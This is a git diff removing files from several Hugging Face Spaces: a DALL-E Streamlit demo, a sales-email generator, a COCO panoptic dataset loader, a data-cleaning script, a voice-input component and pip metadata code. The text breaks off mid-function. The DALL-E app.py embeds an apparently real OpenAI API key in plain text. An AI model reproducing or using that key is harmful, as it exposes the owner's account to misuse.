transforms.ToTensor(), - self.normalize, - ] - ) - - @classmethod - def from_config(cls, cfg=None): - if cfg is None: - cfg = OmegaConf.create() - - image_size = cfg.get("image_size", 224) - - mean = cfg.get("mean", None) - std = cfg.get("std", None) - - return cls( - image_size=image_size, - mean=mean, - std=std, - ) diff --git a/spaces/Serg4451D/DALLE/app.py b/spaces/Serg4451D/DALLE/app.py deleted file mode 100644 index 3648e33adc5454e7cbe95f7ff08c4ecdb6930768..0000000000000000000000000000000000000000 --- a/spaces/Serg4451D/DALLE/app.py +++ /dev/null @@ -1,50 +0,0 @@ -import streamlit as st -import requests -from requests.structures import CaseInsensitiveDict - -import json - -query_url = "https://api.openai.com/v1/images/generations" - -st.title("DALL-E 2 API Image Generation Demo") - -st.write("Enter a prompt to generate an image") - -prompt = st.text_area("Prompt", "A cat riding a bike") - -model = st.selectbox( - "Select a DALL-E 2 model", - ["image-alpha-001", ""] -) - -num_images = st.slider("Number of images to generate", min_value=1, max_value=10, value=1) - -headers = CaseInsensitiveDict() -headers["Content-Type"] = "application/json" -api_key = "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" -headers["Authorization"] = f"Bearer {api_key}" - -data = """ -{ - """ -data += f'"model": "{model}",' -data += f'"prompt": "{prompt}",' -data += f'"num_images": {num_images}' -data += """ -} -""" - -def generate_images(): - resp = requests.post(query_url, headers=headers, data=data) - - if resp.status_code != 200: - raise ValueError("Failed to generate image "+resp.text) - - response_text = json.loads(resp.text) - return response_text['data'] - -if st.button("Generate Images"): - with st.spinner("Generating images..."): - image_data = generate_images() - for idx, image in enumerate(image_data): - st.image(image['url'], caption=f"Image {idx+1}", width=400) diff --git a/spaces/Shine1916/MyChat/README.md b/spaces/Shine1916/MyChat/README.md deleted file mode 100644 index 334b01a484931fdc434cf1a067662aa1d647abc9..0000000000000000000000000000000000000000 --- a/spaces/Shine1916/MyChat/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: 智能AI聊天系统 -emoji: 🌍 -colorFrom: blue -colorTo: yellow -sdk: gradio -sdk_version: 3.18.0 -app_file: app.py -pinned: false -python: 3.8.9 -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/ShreyaRao/SummarizeEasy/README.md b/spaces/ShreyaRao/SummarizeEasy/README.md deleted file mode 100644 index 9d6535ba74b382f1e36666246b797416124d7bb1..0000000000000000000000000000000000000000 --- a/spaces/ShreyaRao/SummarizeEasy/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SummarizeEasy -emoji: 👀 -colorFrom: green -colorTo: blue -sdk: streamlit -sdk_version: 1.21.0 -app_file: app.py -pinned: false -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Sibanjan/Email/app.py b/spaces/Sibanjan/Email/app.py deleted file mode 100644 index db77c19ae663858bc4a30ff33d6d0eb5a41a377d..0000000000000000000000000000000000000000 --- a/spaces/Sibanjan/Email/app.py +++ /dev/null @@ -1,56 +0,0 @@ - -import openai -import gradio as gr -import os - -open_ai_key = os.environ["open_ai_key"] - -openai.api_key = open_ai_key # Replace this with your API key: https://beta.openai.com/docs/quickstart/add-your-api-key - -def openai_chat(prompt): - completions = openai.Completion.create( - engine="text-davinci-003", - prompt=prompt, - max_tokens=1024, - n=1, - temperature=0.5, - ) - - message = completions.choices[0].text - return message.strip() - -def build_type_1(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to sell servicenow product to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing on {theme} and is relevant for job {job_role}" - -def build_type_2(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to sell servicenow product to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing on {theme} and is relevant for job {job_role}.Start with congratulating {job_role} for the new role" - -def build_prod_upgrade_yes(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to inform on new product update for servicenow to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing on {theme} and is relevant for job {job_role}.Start with congratulating {job_role} for the new role" - -def build_prod_upgrade_no(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to inform on new product update for servicenow to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing on {theme} and is relevant for job {job_role}." - -def call_email(Email_Type,industry,keywords, theme, content_url,job_role_change, job_role,prospect_context, history=[]): - if job_role_change=="Yes": - if Email_Type=="Product Upgrade Communication": - input_agg = build_prod_upgrade_yes(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - else: - input_agg = build_type_2(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - elif job_role_change=="No": - if Email_Type=="Product Upgrade Communication": - input_agg = build_prod_upgrade_no(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - else: - input_agg = build_type_1(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - print(input_agg) - output = openai_chat(input_agg) - history=[] - history.append((Email_Type, output)) - return history, history - -gr.Interface(fn = call_email, - inputs = [gr.Radio(["First Touch", "Persuasive", "Followup","Event Invitation","New Launch Communication", "Product Upgrade Communication"],value="First Touch"),"text","text","text","text",gr.Dropdown(["Yes", "No"],value="No"),"text",'text','state'], - outputs = ["chatbot",'state']).launch(debug = True) - - -gr.launch(share=True) \ No newline at end of file diff --git a/spaces/SlowBette/ChatBot_gpt3.5/README.md b/spaces/SlowBette/ChatBot_gpt3.5/README.md deleted file mode 100644 index 6fc21d4e19f72c39d0f26953a9b1291a8d4c1c57..0000000000000000000000000000000000000000 --- a/spaces/SlowBette/ChatBot_gpt3.5/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: ChatBot Gpt3.5 -emoji: 📉 -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/data/datasets/register_coco_panoptic_annos_semseg.py b/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/data/datasets/register_coco_panoptic_annos_semseg.py deleted file mode 100644 index 170daf3ee71d9302220370d70f7c0160a4c2a235..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/data/datasets/register_coco_panoptic_annos_semseg.py +++ /dev/null @@ -1,367 +0,0 @@ -# ------------------------------------------------------------------------------ -# Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/data/datasets/register_coco_panoptic_annos_semseg.py -# Modified by Jitesh Jain (https://github.com/praeclarumjj3) -# ------------------------------------------------------------------------------ - -import json -import os - -from annotator.oneformer.detectron2.data import DatasetCatalog, MetadataCatalog -from annotator.oneformer.detectron2.data.datasets import load_sem_seg -from annotator.oneformer.detectron2.data.datasets.builtin_meta import COCO_CATEGORIES -from annotator.oneformer.detectron2.utils.file_io import PathManager -import contextlib -import logging -import io -from fvcore.common.timer import Timer -import annotator.oneformer.pycocotools.mask as mask_util -from annotator.oneformer.detectron2.structures import BoxMode - - -logger = logging.getLogger(__name__) - - -_PREDEFINED_SPLITS_COCO_PANOPTIC = { - "coco_2017_train_panoptic": ( - # This is the original panoptic annotation directory - "coco/panoptic_train2017", - "coco/annotations/panoptic_train2017.json", - # This directory contains semantic annotations that are - # converted from panoptic annotations. - # It is used by PanopticFPN. - # You can use the script at detectron2/datasets/prepare_panoptic_fpn.py - # to create these directories. - "coco/panoptic_semseg_train2017", - ), - "coco_2017_val_panoptic": ( - "coco/panoptic_val2017", - "coco/annotations/panoptic_val2017.json", - "coco/panoptic_semseg_val2017", - ), -} - -def load_coco_instance_json(json_file, image_root, dataset_name=None): - from annotator.oneformer.pycocotools.coco import COCO - - timer = Timer() - json_file = PathManager.get_local_path(json_file) - with contextlib.redirect_stdout(io.StringIO()): - coco_api = COCO(json_file) - if timer.seconds() > 1: - logger.info("Loading {} takes {:.2f} seconds.".format(json_file, timer.seconds())) - - id_map = None - if dataset_name is not None: - meta = MetadataCatalog.get(dataset_name) - cat_ids = sorted(coco_api.getCatIds()) - cats = coco_api.loadCats(cat_ids) - # The categories in a custom json file may not be sorted. - thing_classes = [c["name"] for c in sorted(cats, key=lambda x: x["id"])] - meta.thing_classes = thing_classes - - # In COCO, certain category ids are artificially removed, - # and by convention they are always ignored. - # We deal with COCO's id issue and translate - # the category ids to contiguous ids in [0, 80). - - # It works by looking at the "categories" field in the json, therefore - # if users' own json also have incontiguous ids, we'll - # apply this mapping as well but print a warning. - if not (min(cat_ids) == 1 and max(cat_ids) == len(cat_ids)): - if "coco" not in dataset_name: - logger.warning( - """ -Category ids in annotations are not in [1, #categories]! We'll apply a mapping for you. -""" - ) - id_map = {v: i for i, v in enumerate(cat_ids)} - meta.thing_dataset_id_to_contiguous_id = id_map - - # sort indices for reproducible results - img_ids = sorted(coco_api.imgs.keys()) - # imgs is a list of dicts, each looks something like: - # {'license': 4, - # 'url': 'http://farm6.staticflickr.com/5454/9413846304_881d5e5c3b_z.jpg', - # 'file_name': 'COCO_val2014_000000001268.jpg', - # 'height': 427, - # 'width': 640, - # 'date_captured': '2013-11-17 05:57:24', - # 'id': 1268} - imgs = coco_api.loadImgs(img_ids) - # anns is a list[list[dict]], where each dict is an annotation - # record for an object. The inner list enumerates the objects in an image - # and the outer list enumerates over images. Example of anns[0]: - # [{'segmentation': [[192.81, - # 247.09, - # ... - # 219.03, - # 249.06]], - # 'area': 1035.749, - # 'iscrowd': 0, - # 'image_id': 1268, - # 'bbox': [192.81, 224.8, 74.73, 33.43], - # 'category_id': 16, - # 'id': 42986}, - # ...] - anns = [coco_api.imgToAnns[img_id] for img_id in img_ids] - total_num_valid_anns = sum([len(x) for x in anns]) - total_num_anns = len(coco_api.anns) - if total_num_valid_anns < total_num_anns: - logger.warning( - f"{json_file} contains {total_num_anns} annotations, but only " - f"{total_num_valid_anns} of them match to images in the file." - ) - - if "minival" not in json_file: - # The popular valminusminival & minival annotations for COCO2014 contain this bug. - # However the ratio of buggy annotations there is tiny and does not affect accuracy. - # Therefore we explicitly white-list them. - ann_ids = [ann["id"] for anns_per_image in anns for ann in anns_per_image] - assert len(set(ann_ids)) == len(ann_ids), "Annotation ids in '{}' are not unique!".format( - json_file - ) - - imgs_anns = list(zip(imgs, anns)) - logger.info("Loaded {} images in COCO format from {}".format(len(imgs_anns), json_file)) - - dataset_dicts = {} - - ann_keys = ["iscrowd", "bbox", "keypoints", "category_id"] - - num_instances_without_valid_segmentation = 0 - - for (img_dict, anno_dict_list) in imgs_anns: - record = {} - record["file_name"] = os.path.join(image_root, img_dict["file_name"]) - record["height"] = img_dict["height"] - record["width"] = img_dict["width"] - image_id = record["image_id"] = img_dict["id"] - - objs = [] - for anno in anno_dict_list: - # Check that the image_id in this annotation is the same as - # the image_id we're looking at. - # This fails only when the data parsing logic or the annotation file is buggy. - - # The original COCO valminusminival2014 & minival2014 annotation files - # actually contains bugs that, together with certain ways of using COCO API, - # can trigger this assertion. - assert anno["image_id"] == image_id - - assert anno.get("ignore", 0) == 0, '"ignore" in COCO json file is not supported.' - - obj = {key: anno[key] for key in ann_keys if key in anno} - if "bbox" in obj and len(obj["bbox"]) == 0: - raise ValueError( - f"One annotation of image {image_id} contains empty 'bbox' value! " - "This json does not have valid COCO format." - ) - - segm = anno.get("segmentation", None) - if segm: # either list[list[float]] or dict(RLE) - if isinstance(segm, dict): - if isinstance(segm["counts"], list): - # convert to compressed RLE - segm = mask_util.frPyObjects(segm, *segm["size"]) - else: - # filter out invalid polygons (< 3 points) - segm = [poly for poly in segm if len(poly) % 2 == 0 and len(poly) >= 6] - if len(segm) == 0: - num_instances_without_valid_segmentation += 1 - continue # ignore this instance - obj["segmentation"] = segm - - keypts = anno.get("keypoints", None) - if keypts: # list[int] - for idx, v in enumerate(keypts): - if idx % 3 != 2: - # COCO's segmentation coordinates are floating points in [0, H or W], - # but keypoint coordinates are integers in [0, H-1 or W-1] - # Therefore we assume the coordinates are "pixel indices" and - # add 0.5 to convert to floating point coordinates. - keypts[idx] = v + 0.5 - obj["keypoints"] = keypts - - obj["bbox_mode"] = BoxMode.XYWH_ABS - if id_map: - annotation_category_id = obj["category_id"] - try: - obj["category_id"] = id_map[annotation_category_id] - except KeyError as e: - raise KeyError( - f"Encountered category_id={annotation_category_id} " - "but this id does not exist in 'categories' of the json file." - ) from e - objs.append(obj) - record["annotations"] = objs - dataset_dicts[image_id] = record - - if num_instances_without_valid_segmentation > 0: - logger.warning( - "Filtered out {} instances without valid segmentation. ".format( - num_instances_without_valid_segmentation - ) - + "There might be issues in your dataset generation process. Please " - "check https://detectron2.readthedocs.io/en/latest/tutorials/datasets.html carefully" - ) - return dataset_dicts - -def get_metadata(): - meta = {} - # The following metadata maps contiguous id from [0, #thing categories + - # #stuff categories) to their names and colors. We have to replica of the - # same name and color under "thing_*" and "stuff_*" because the current - # visualization function in D2 handles thing and class classes differently - # due to some heuristic used in Panoptic FPN. We keep the same naming to - # enable reusing existing visualization functions. - thing_classes = [k["name"] for k in COCO_CATEGORIES if k["isthing"] == 1] - thing_colors = [k["color"] for k in COCO_CATEGORIES if k["isthing"] == 1] - stuff_classes = [k["name"] for k in COCO_CATEGORIES] - stuff_colors = [k["color"] for k in COCO_CATEGORIES] - - meta["thing_classes"] = thing_classes - meta["thing_colors"] = thing_colors - meta["stuff_classes"] = stuff_classes - meta["stuff_colors"] = stuff_colors - - # Convert category id for training: - # category id: like semantic segmentation, it is the class id for each - # pixel. Since there are some classes not used in evaluation, the category - # id is not always contiguous and thus we have two set of category ids: - # - original category id: category id in the original dataset, mainly - # used for evaluation. - # - contiguous category id: [0, #classes), in order to train the linear - # softmax classifier. - thing_dataset_id_to_contiguous_id = {} - stuff_dataset_id_to_contiguous_id = {} - - for i, cat in enumerate(COCO_CATEGORIES): - if cat["isthing"]: - thing_dataset_id_to_contiguous_id[cat["id"]] = i - # else: - # stuff_dataset_id_to_contiguous_id[cat["id"]] = i - - # in order to use sem_seg evaluator - stuff_dataset_id_to_contiguous_id[cat["id"]] = i - - meta["thing_dataset_id_to_contiguous_id"] = thing_dataset_id_to_contiguous_id - meta["stuff_dataset_id_to_contiguous_id"] = stuff_dataset_id_to_contiguous_id - - return meta - - -def load_coco_panoptic_json(json_file, instances_json, instances_name, image_dir, gt_dir, semseg_dir, meta): - """ - Args: - image_dir (str): path to the raw dataset. e.g., "~/coco/train2017". - gt_dir (str): path to the raw annotations. e.g., "~/coco/panoptic_train2017". - json_file (str): path to the json file. e.g., "~/coco/annotations/panoptic_train2017.json". - Returns: - list[dict]: a list of dicts in Detectron2 standard format. (See - `Using Custom Datasets `_ ) - """ - - def _convert_category_id(segment_info, meta): - if segment_info["category_id"] in meta["thing_dataset_id_to_contiguous_id"]: - segment_info["category_id"] = meta["thing_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - segment_info["isthing"] = True - else: - segment_info["category_id"] = meta["stuff_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - segment_info["isthing"] = False - return segment_info - - with PathManager.open(json_file) as f: - json_info = json.load(f) - - instance_data_dicts = load_coco_instance_json(instances_json, image_dir.replace("panoptic_", ""), instances_name) - - ret = [] - for ann in json_info["annotations"]: - image_id = int(ann["image_id"]) - # TODO: currently we assume image and label has the same filename but - # different extension, and images have extension ".jpg" for COCO. Need - # to make image extension a user-provided argument if we extend this - # function to support other COCO-like datasets. - image_file = os.path.join(image_dir, os.path.splitext(ann["file_name"])[0] + ".jpg") - label_file = os.path.join(gt_dir, ann["file_name"]) - sem_label_file = os.path.join(semseg_dir, ann["file_name"]) - segments_info = [_convert_category_id(x, meta) for x in ann["segments_info"]] - ret.append( - { - "file_name": image_file, - "image_id": image_id, - "pan_seg_file_name": label_file, - "sem_seg_file_name": sem_label_file, - "segments_info": segments_info, - "annotations": instance_data_dicts[image_id]["annotations"], - } - ) - assert len(ret), f"No images found in {image_dir}!" - assert PathManager.isfile(ret[0]["file_name"]), ret[0]["file_name"] - assert PathManager.isfile(ret[0]["pan_seg_file_name"]), ret[0]["pan_seg_file_name"] - assert PathManager.isfile(ret[0]["sem_seg_file_name"]), ret[0]["sem_seg_file_name"] - return ret - - -def register_coco_panoptic_annos_sem_seg( - name, metadata, image_root, panoptic_root, panoptic_json, sem_seg_root, instances_json, instances_name, -): - panoptic_name = name - delattr(MetadataCatalog.get(panoptic_name), "thing_classes") - delattr(MetadataCatalog.get(panoptic_name), "thing_colors") - MetadataCatalog.get(panoptic_name).set( - thing_classes=metadata["thing_classes"], - thing_colors=metadata["thing_colors"], - # thing_dataset_id_to_contiguous_id=metadata["thing_dataset_id_to_contiguous_id"], - ) - - # the name is "coco_2017_train_panoptic_with_sem_seg" and "coco_2017_val_panoptic_with_sem_seg" - semantic_name = name + "_with_sem_seg" - DatasetCatalog.register( - semantic_name, - lambda: load_coco_panoptic_json(panoptic_json, instances_json, instances_name, image_root, panoptic_root, sem_seg_root, metadata), - ) - MetadataCatalog.get(semantic_name).set( - sem_seg_root=sem_seg_root, - panoptic_root=panoptic_root, - image_root=image_root, - panoptic_json=panoptic_json, - json_file=instances_json, - evaluator_type="coco_panoptic_seg", - ignore_label=255, - label_divisor=1000, - **metadata, - ) - - -def register_all_coco_panoptic_annos_sem_seg(root): - for ( - prefix, - (panoptic_root, panoptic_json, semantic_root), - ) in _PREDEFINED_SPLITS_COCO_PANOPTIC.items(): - - prefix_instances = prefix[: -len("_panoptic")] - instances_meta = MetadataCatalog.get(prefix_instances) - image_root, instances_json = instances_meta.image_root, instances_meta.json_file - - if 'val' in instances_json: - instances_json = instances_json.replace('instances_', 'panoptic2instances_') - - register_coco_panoptic_annos_sem_seg( - prefix, - get_metadata(), - image_root, - os.path.join(root, panoptic_root), - os.path.join(root, panoptic_json), - os.path.join(root, semantic_root), - instances_json, - prefix_instances, - ) - - -_root = os.getenv("DETECTRON2_DATASETS", "datasets") -register_all_coco_panoptic_annos_sem_seg(_root) diff --git a/spaces/TBF/AutomaticDatavisualization/data_clean.py b/spaces/TBF/AutomaticDatavisualization/data_clean.py deleted file mode 100644 index ab1544c1c06e4f6d68060d3b47e59326ebfde375..0000000000000000000000000000000000000000 --- a/spaces/TBF/AutomaticDatavisualization/data_clean.py +++ /dev/null @@ -1,242 +0,0 @@ -# from cv2 import dft -import pandas as pd -import numpy as np -from sklearn.impute import KNNImputer -import streamlit as st - -# def remove_col(df ,i): -# df.drop([i], axis = 1,inplace = True) -# return df - -# def column_delete(df, column_name): -# print("deleting the column: ", column_name) -# # new_df = (df.drop['column_name'], axis=1) -# del df[column_name] -# df.head() -# return df - -# def row_delete(df, row_number): -# print("deleting the row number: ", row_number) -# df.drop(df.index[row_number]) -# df.head() -# return df - -# def mean_fill(df,column_name): -# mean_value=df[column_name].mean() -# filled = df[column_name].fillna(value=mean_value, inplace=True) -# return filled - -# def median_fill(df,column_name): -# median_value=df[column_name].median() -# filled = df[column_name].fillna(value=median_value, inplace=True) -# return filled - -# def random_fill(df): -# for i in df.columns: -# df[i+"_imputed"] = df[i] -# df[i+"_imputed"][df[i+"_imputed"].isnull()] = df[i].dropna().sample(df[i].isnull().sum()).values - -# def EndDistribution(df, column_name): - -# mean = df[column_name].mean() -# std = df[column_name].std() -# #calculating extreme standard deviation -# extreme = (mean + (3*std)) -# df[column_name+'_median'] = df[column_name].fillna(df[column_name].median()) -# df[column_name+'_end_distribution'] = df[column_name].fillna(extreme) -# return df - -# #knn imputer - - -# def impute_knn(df): -# ''' -# function for knn imputation in missing values in the data -# df - dataset provided by the users -# ''' -# from sklearn.impute import KNNImputer -# imputer =KNNImputer(n_neighbors=5) - -# #finding only numeric columns -# cols_num = df.select_dtypes(include=np.number).columns -# for feature in df.columns: -# #for numeric type -# if feature in cols_num: -# df[feature] = pd.DataFrame(imputer.fit_transform(np.array(df[feature]).reshape(-1, 1))) -# else: -# #for categorical type -# df[feature] = df[feature].fillna(df[feature].mode().iloc[0]) -# return df - -# #Z score capping -# def zScore(df): -# cols_num = df.select_dtypes(include=np.number).columns -# for i in cols_num: -# max_threshold = df[i].mean() + 3*df[i].std() -# min_threshold = df[i].mean() - 3*df[i].std() -# # df = df[(df['cgpa'] > 8.80) | (df['cgpa'] < 5.11)] -# df[i] = np.where( -# df[i]>max_threshold, -# max_threshold, -# np.where( -# df[i] min_threshold)] -# return df - -# # Ourlier using Percentile -# # trimming -# def percentile_trimming(df): -# cols_num = df.select_dtypes(include=np.number).columns -# for i in cols_num: -# percentile25 = df[i].quantile(0.25) -# percentile75 = df[i].quantile(0.75) -# iqr = percentile75 - percentile25 -# max_threshold = percentile75 + 3*iqr -# min_threshold = percentile25 - 3*iqr -# df = df[(df[i] < max_threshold) | (df[i] > min_threshold)] -# return df - -# #capping -# def percentile_capping(df): -# cols_num = df.select_dtypes(include=np.number).columns -# for i in cols_num: -# percentile25 = df[i].quantile(0.25) -# percentile75 = df[i].quantile(0.75) -# iqr = percentile75 - percentile25 -# max_threshold = percentile75 + 3*iqr -# min_threshold = percentile25 - 3*iqr -# df[i] = np.where( -# df[i]>max_threshold, -# max_threshold, -# np.where( -# df[i] 1: -# for i in range(len(price_cols)): -# df.rename(columns={price_cols[i]: 'price_'+str(i+1)}, inplace=True) -# elif len(price_cols) == 1: -# df.rename(columns={price_cols[0]: 'price'}, inplace=True) -# return df - - -# def data_cleaning(df): -# import pandas as pd -# import numpy as np -# from sklearn.impute import KNNImputer -# pd.set_option('display.max_rows', 100) -# for i in df.columns: -# if ((df[i].isna().sum())/df.shape[0]) > 0.95: -# df = remove_col(df,i) -# else: -# df = df.copy() -# df = impute_knn(df) -# return df - - -# class missing_df: -# def __init__(self, df): -# self.df = df -# print(self.df) -#functions for handling missing values - -class missing_df: - def __init__ (self,dataset): - self.dataset = dataset - -def handle_missing_value(): - df = pd.read_csv("temp_data/test.csv") - missing_count = df.isnull().sum().sum() - if missing_count != 0: - print(f"Found total of {missing_count} missing values.") - - #remove column having name starts with Unnamed - df =df.loc[:,~df.columns.str.startswith('Unnamed')] - - #drop columns having more than 90% missing values - for i in df.columns.to_list(): - if df[f"{i}"].isna().mean().round(4) > 0.9: - df = df.drop(i, axis=1) - - #converting object datatype to integer if present - for j in df.columns.values.tolist(): # Iterate on columns of dataframe - try: - df[j] = df[j].astype('int') # Convert datatype from object to int, of columns having all integer values - except: - pass - - - # find date column in dataframe and convert it to datetime format - try: - df = df.apply(lambda col: pd.to_datetime(col, errors='ignore') if col.dtypes == object else col, axis=0) - except: - pass - - #impute missing values - imputer = KNNImputer(n_neighbors=3) - #finding numerical columns from dataset - cols_num = df.select_dtypes(include=np.number).columns - for feature in df.columns: - #for numeric type - if feature in cols_num: - df[feature] = pd.DataFrame(imputer.fit_transform(np.array(df[feature]).reshape(-1, 1))) - else: - #for categorical type - df[feature] = df[feature].fillna(df[feature].mode().iloc[0]) - - # def add_binary_col(df): - # """ - # Functions to add binary column which tells if the data was missing or not - # """ - # for label, content in df.items(): - # if pd.isnull(content).sum(): - # df["ismissing_"+label] = pd.isnull(content) - # return df - st.write(df) - return df - - - diff --git a/spaces/TEnngal/bingo/src/components/voice.tsx b/spaces/TEnngal/bingo/src/components/voice.tsx deleted file mode 100644 index ab886394487445e4b0675770b76096bba0e61b0e..0000000000000000000000000000000000000000 --- a/spaces/TEnngal/bingo/src/components/voice.tsx +++ /dev/null @@ -1,52 +0,0 @@ -import React, { useEffect } from 'react' -import { useSetAtom } from 'jotai' -import { useBing } from '@/lib/hooks/use-bing' -import Image from 'next/image' -import VoiceIcon from '@/assets/images/voice.svg' -import VoiceButton from './ui/voice' -import { SR } from '@/lib/bots/bing/sr' -import { voiceListenAtom } from '@/state' - -const sr = new SR(['发送', '清空', '退出']) - -const Voice = ({ setInput, input, sendMessage, isSpeaking }: Pick, 'setInput' | 'sendMessage' | 'input' | 'isSpeaking'>) => { - const setListen = useSetAtom(voiceListenAtom) - useEffect(() => { - if (sr.listening) return - sr.transcript = !isSpeaking - }, [isSpeaking]) - - useEffect(() => { - sr.onchange = (msg: string, command?: string) => { - switch (command) { - case '退出': - sr.stop() - break; - case '发送': - sendMessage(input) - case '清空': - setInput('') - break; - default: - setInput(input + msg) - } - } - }, [input, setInput, sendMessage]) - - const switchSR = (enable: boolean = false) => { - setListen(enable) - if (enable) { - sr.start() - } else { - sr.stop() - } - } - - return sr.listening ? ( - switchSR(false)} /> - ) : ( - start voice switchSR(true)} /> - ) -}; - -export default Voice; diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/metadata/pkg_resources.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/metadata/pkg_resources.py deleted file mode 100644 index f330ef12a2c5ea0a4adbecbeea389741479d5eb4..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/metadata/pkg_resources.py +++ /dev/null @@ -1,270 +0,0 @@ -import email.message -import email.parser -import logging -import os -import zipfile -from typing import Collection, Iterable, Iterator, List, Mapping, NamedTuple, Optional - -from pip._vendor import pkg_resources -from pip._vendor.packaging.requirements import Requirement -from pip._vendor.packaging.utils import NormalizedName, canonicalize_name -from pip._vendor.packaging.version import parse as parse_version - -from pip._internal.exceptions import InvalidWheel, NoneMetadataError, UnsupportedWheel -from pip._internal.utils.egg_link import egg_link_path_from_location -from pip._internal.utils.misc import display_path, normalize_path -from pip._internal.utils.wheel import parse_wheel, read_wheel_metadata_file - -from .base import ( - BaseDistribution, - BaseEntryPoint, - BaseEnvironment, - DistributionVersion, - InfoPath, - Wheel, -) - -logger = logging.getLogger(__name__) - - -class EntryPoint(NamedTuple): - name: str - value: str - group: str - - -class InMemoryMetadata: - """IMetadataProvider that reads metadata files from a dictionary. - - This also maps metadata decoding exceptions to our internal exception type. - """ - - def __init__(self, metadata: Mapping[str, bytes], wheel_name: str) -> None: - self._metadata = metadata - self._wheel_name = wheel_name - - def has_metadata(self, name: str) -> bool: - return name in self._metadata - - def get_metadata(self, name: str) -> str: - try: - return self._metadata[name].decode() - except UnicodeDecodeError as e: - # Augment the default error with the origin of the file. - raise UnsupportedWheel( - f"Error decoding metadata for {self._wheel_name}: {e} in {name} file" - ) - - def get_metadata_lines(self, name: str) -> Iterable[str]: - return pkg_resources.yield_lines(self.get_metadata(name)) - - def metadata_isdir(self, name: str) -> bool: - return False - - def metadata_listdir(self, name: str) -> List[str]: - return [] - - def run_script(self, script_name: str, namespace: str) -> None: - pass - - -class Distribution(BaseDistribution): - def __init__(self, dist: pkg_resources.Distribution) -> None: - self._dist = dist - - @classmethod - def from_directory(cls, directory: str) -> BaseDistribution: - dist_dir = directory.rstrip(os.sep) - - # Build a PathMetadata object, from path to metadata. :wink: - base_dir, dist_dir_name = os.path.split(dist_dir) - metadata = pkg_resources.PathMetadata(base_dir, dist_dir) - - # Determine the correct Distribution object type. - if dist_dir.endswith(".egg-info"): - dist_cls = pkg_resources.Distribution - dist_name = os.path.splitext(dist_dir_name)[0] - else: - assert dist_dir.endswith(".dist-info") - dist_cls = pkg_resources.DistInfoDistribution - dist_name = os.path.splitext(dist_dir_name)[0].split("-")[0] - - dist = dist_cls(base_dir, project_name=dist_name, metadata=metadata) - return cls(dist) - - @classmethod - def from_metadata_file_contents( - cls, - metadata_contents: bytes, - filename: str, - project_name: str, - ) -> BaseDistribution: - metadata_dict = { - "METADATA": metadata_contents, - } - dist = pkg_resources.DistInfoDistribution( - location=filename, - metadata=InMemoryMetadata(metadata_dict, filename), - project_name=project_name, - ) - return cls(dist) - - @classmethod - def from_wheel(cls, wheel: Wheel, name: str) -> BaseDistribution: - try: - with wheel.as_zipfile() as zf: - info_dir, _ = parse_wheel(zf, name) - metadata_dict = { - path.split("/", 1)[-1]: read_wheel_metadata_file(zf, path) - for path in zf.namelist() - if path.startswith(f"{info_dir}/") - } - except zipfile.BadZipFile as e: - raise InvalidWheel(wheel.location, name) from e - except UnsupportedWheel as e: - raise UnsupportedWheel(f"{name} has an invalid wheel, {e}") - dist = pkg_resources.DistInfoDistribution( - location=wheel.location, - metadata=InMemoryMetadata(metadata_dict, wheel.location), - project_name=name, - ) - return cls(dist) - - @property - def location(self) -> Optional[str]: - return self._dist.location - - @property - def installed_location(self) -> Optional[str]: - egg_link = egg_link_path_from_location(self.raw_name) - if egg_link: - location = egg_link - elif self.location: - location = self.location - else: - return None - return normalize_path(location) - - @property - def info_location(self) -> Optional[str]: - return self._dist.egg_info - - @property - def installed_by_distutils(self) -> bool: - # A distutils-installed distribution is provided by FileMetadata. This - # provider has a "path" attribute not present anywhere else. Not the - # best introspection logic, but pip has been doing this for a long time. - try: - return bool(self._dist._provider.path) - except AttributeError: - return False - - @property - def canonical_name(self) -> NormalizedName: - return canonicalize_name(self._dist.project_name) - - @property - def version(self) -> DistributionVersion: - return parse_version(self._dist.version) - - def is_file(self, path: InfoPath) -> bool: - return self._dist.has_metadata(str(path)) - - def iter_distutils_script_names(self) -> Iterator[str]: - yield from self._dist.metadata_listdir("scripts") - - def read_text(self, path: InfoPath) -> str: - name = str(path) - if not self._dist.has_metadata(name): - raise FileNotFoundError(name) - content = self._dist.get_metadata(name) - if content is None: - raise NoneMetadataError(self, name) - return content - - def iter_entry_points(self) -> Iterable[BaseEntryPoint]: - for group, entries in self._dist.get_entry_map().items(): - for name, entry_point in entries.items(): - name, _, value = str(entry_point).partition("=") - yield 